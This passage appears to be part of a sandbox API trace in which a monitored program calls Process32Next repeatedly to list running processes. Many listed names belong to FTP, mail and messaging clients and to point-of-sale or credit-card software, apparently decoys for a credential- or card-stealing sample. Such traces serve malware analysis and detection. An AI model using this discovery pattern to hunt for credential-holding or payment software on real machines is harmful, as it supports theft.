pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.626] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.628] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0283.629] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0283.631] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0283.633] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.635] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0283.640] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0283.642] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0283.644] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0283.646] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.647] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0283.649] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0283.651] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.691] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.693] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0283.695] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0283.697] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0283.699] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0283.704] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0283.706] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0283.708] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0283.710] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0283.711] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0283.713] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0283.718] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0283.720] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0283.721] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0283.722] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0283.724] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0283.725] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0283.727] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0283.728] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0283.729] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0283.784] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0283.785] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0283.786] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0283.788] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0283.789] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0283.791] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0283.792] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0283.796] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0283.798] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0283.800] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0283.802] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0283.803] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0283.805] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0283.807] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0283.809] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0283.813] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0283.814] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0283.816] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0283.818] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0283.819] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0283.821] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0283.823] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0283.834] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0283.836] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0283.838] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0283.839] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0283.844] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0283.845] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0283.847] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0283.848] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0283.850] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0283.851] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0283.853] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0283.855] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0283.859] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0283.861] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0283.862] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0283.864] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0283.865] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0283.867] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0283.868] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0283.870] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0283.920] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0283.922] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0283.924] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.925] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.927] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0283.928] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.930] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0283.931] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, 